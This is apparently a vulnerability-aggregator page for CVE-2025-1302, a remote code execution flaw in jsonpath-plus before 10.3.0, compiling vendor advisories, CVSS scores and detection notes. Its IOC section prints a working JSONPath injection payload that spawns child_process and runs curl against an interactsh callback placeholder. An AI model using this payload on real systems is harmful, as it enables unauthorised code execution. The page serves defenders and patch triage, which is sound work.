CVE-2025-1302
published 2025-02-15CVE-2025-1302: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute…
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
10.70%
95.3th percentile
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Detection & IOCsextracted from sources · hover to see the quote
command$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]↗
- →Exploit targets common JSON query endpoints via HTTP POST with Content-Type: application/json. Monitor POST requests to /query, /jsonpath, /api/query, /data, /parse, /filter, /expression containing JSONPath filter expressions with constructor references. ↗
- →Successful exploitation can be confirmed via out-of-band DNS/HTTP callback (interactsh). Monitor for unexpected outbound DNS or HTTP requests originating from the Node.js process after processing JSONPath queries. ↗
- →The vulnerability exploits the unsafe default `eval='safe'` mode in jsonpath-plus. Audit all deployments of jsonpath-plus for versions before 10.3.0 and check if user-controlled input is passed to JSONPath evaluation. ↗
- →Payload leverages `this.process.mainModule.require('child_process')` to spawn OS commands. Alert on Node.js child_process spawning from within JSONPath evaluation contexts. ↗
- ·Red Hat downgraded impact to low for their products because no exploitable code paths exist in affected Red Hat products, and in OpenShift AI the jsonpath-plus dependency is never loaded. ↗
- ·In Red Hat OpenShift AI, jsonpath-plus is a transitive dependency and the direct dependency's feature that requires it is not used, meaning the vulnerable code is never loaded. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.9HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
vendor_redhat·2025-02-15·CVSS 9.8
CVE-2025-1302 [CRITICAL] CWE-94 jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:**
This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
A flaw was found in jsonpath-plus. This vulnerability allows remote code execution (RCE) via improper input sanitization, exploiting the unsafe default usage of eval='safe' mode.
Statement: Red Hat's initial impact rating of critical has been downgraded to low. While the vulnerable code is technically still present within Red Hat pro
OSV
JSONPath Plus allows Remote Code Execution
osv·2025-02-15·CVSS 9.8
CVE-2025-1302 [CRITICAL] JSONPath Plus allows Remote Code Execution
JSONPath Plus allows Remote Code Execution
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:**
This is caused by an incomplete fix for CVE-2024-21534.
GHSA
JSONPath Plus allows Remote Code Execution
ghsa·2025-02-15·CVSS 9.8
CVE-2025-1302 [CRITICAL] CWE-94 JSONPath Plus allows Remote Code Execution
JSONPath Plus allows Remote Code Execution
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:**
This is caused by an incomplete fix for CVE-2024-21534.
VulnCheck
Improper Control of Generation of Code ('Code Injection')
vulncheck·2025·CVSS 9.8
CVE-2025-1302 [CRITICAL] Improper Control of Generation of Code ('Code Injection')
Improper Control of Generation of Code ('Code Injection')
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Affected: JSONPath-plus JSONPath-plus
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-11-19&host_type=src&vulnerability=cve-2025-1302; https://das
No detection rules found.
Nuclei
JSONPath Plus < 10.3.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2025-1302 [CRITICAL] JSONPath Plus < 10.3.0 - Remote Code Execution
JSONPath Plus < 10.3.0 - Remote Code Execution
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]
Template:
id: CVE-2025-1302
info:
name: JSONPath Plus < 10.3.0 - Remote Code Execution
author: Jaenact
severity: critical
description: |
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for
No writeups or analysis indexed.
https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456https://github.com/JSONPath-Plus/JSONPath/blob/8e4acf8aff5f446aa66323e12394ac5615c3b260/src/Safe-Script.js%23L127https://github.com/JSONPath-Plus/JSONPath/commit/30942896d27cb8a806b965a5ca9ef9f686be24eehttps://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585
2025-02-15
Published
Exploited in the wild